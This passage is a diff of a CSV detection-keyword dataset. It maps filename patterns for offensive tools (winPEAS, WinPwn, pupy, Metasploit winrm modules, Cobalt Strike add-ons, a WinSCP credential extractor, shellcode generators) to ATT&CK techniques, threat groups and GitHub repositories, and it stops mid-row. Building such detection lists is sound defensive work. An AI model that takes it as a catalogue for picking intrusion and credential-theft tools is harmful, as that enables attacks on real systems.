-"*WinPEAS.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
-"*winPEAS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
-"*winPEAS.ps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
-"*winPEAS.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*winPEAS.bat*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*WinPEAS.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*winPEAS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*winPEAS.ps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*winPEAS.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*winPEASany.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*winPEASany.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
+"*winPEASany.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
 "*winPEASany_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*winPEASany_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
-"*winPEAS-Obfuscated*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
-"*winPEASps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
+"*winPEASany_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*winPEAS-Obfuscated*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*winPEASps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 
- T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASx64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASx64.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*winPEASx64_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*winPEASx64.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx64_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege 
Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASx86.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASx86.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*winPEASx86.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASx86_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
-"*winPEASx86_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*Win-PS2EXE.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*WinPwn -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*WinPwn.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*WinPwnage*","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2498","386","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" -"*winpwnage.functions*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*winPEASx86_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*Win-PS2EXE.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*WinPwn -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*WinPwn.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwnage*","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2498","388","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" +"*winpwnage.functions*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*winreconstreamline.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" -"*winregistry.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*winrm_command_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*winrm_script_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*winregistry.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*winrm_command_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*winrm_script_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*winrmdll *","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","0","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" 
"*winrmdll.*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*WinSCPPasswdExtractor*","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","1","8","0","2023-07-01T17:27:32Z","2022-12-20T11:55:55Z" "*WinShellcode.git*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","","N/A","","","" 
"*WinShellcode-main*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","","N/A","","","" -"*Winsocky-main*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*Winsocky-main*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*WINspect.ps1*","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Information Gathering","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","6","568","116","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z" "*win-x64-DynamicKernelWinExecCalc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - 